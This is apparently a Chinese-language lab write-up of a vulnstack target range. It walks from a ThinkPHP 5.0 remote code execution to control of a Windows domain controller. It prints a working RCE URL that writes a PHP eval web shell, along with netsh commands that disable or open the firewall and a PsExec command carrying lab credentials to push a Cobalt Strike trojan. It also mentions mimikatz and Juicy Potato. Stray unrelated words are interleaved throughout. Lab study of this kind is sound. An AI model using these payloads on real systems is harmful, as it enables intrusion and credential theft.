1.環境搭建
靶機下載地址:http://vulnstack.qiyuanxuetang.net/vuln/
win7(雙網卡):
192.168.135.150(外網)
192.168.138.136(內網)
外網使用NAT模式,內網僅主機模式。
php
win2008:html
2.外網信息收集
2.1訪問目標網站發現是個TP框架的站。
2.2版本判斷
經過報錯得知TP的詳細版本
shell
2.3進行目錄掃描
拿服務器權限
1.當咱們確認框架和具體版本後,就能夠尋找框架對應的歷史漏洞poc。
ThinkPhp5.0任意代碼執行:https://www.cnblogs.com/backlion/p/10106676.html服務器
2.嘗試寫入shell
http://192.168.135.150/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_GET["code"]);?^>>shell.php
成功的話會寫入到public目錄下,而後訪問一下shell.php就拿蟻劍鏈接。
而後就進入到咱們的內網了
app
3.內網信息收集
1.查看一下權限
若是權限較低的話就要提權,能夠systeminfo查看補丁信息而後尋找對應的EXP進行提權。
框架
3.1存活主機
4橫向滲透
4.1先打開Cobalt Strike而後讓win7上線
4.2minikatz嘗試讀取密碼
4.3找域控制器
內網掃描存活主機
ipconfig -all 發現DNS後綴爲sun.com這通常是域控制器的域名
ping一下獲得ip
就能夠肯定192.168.138.138的主機就是域控制器了
網站
5拿域控
5.1提權
先把win7的administrator權限提高爲system,這裏使用爛土豆,成功提權SYStem
5.2psexec傳遞
由於域控是不與外網進行接觸的,因此要先在已經上線的主機上創建一個listen
而後生成一個Executable(S)木馬,上傳到win7上
由於自帶的psexec只能夠在目標能夠訪問外網的狀況下使用因此這咱們還要本身上傳一個psexec.exe
由於win7的防火牆緣故,7777端口是進不去的能夠,關閉防火牆:NetSh Advfirewall set allprofiles state off ,或者添加規則來放行7777端口
netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=7777
spa
最後使用上傳的psexec加上抓取的明文密碼配合exe成功上線域控。
Shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138 -u sun\Administrator -p WW123123ww. -d -c C:\phpStudy\PHPTutorial\WWW\public\nei.exe
(psexec的用法)[https://blog.csdn.net/jamesdodo/article/details/81743224]
.net
總結:
先說遇到的坑:system的權限讀取密碼和執行psexec老報錯,administrator就很順利,不曉得是靶機的問題仍是我本身搭建的環境有問題。
充環境搭建到域控上線用了兩天太菜了,不過好在學到了一些東西,加油!!
3d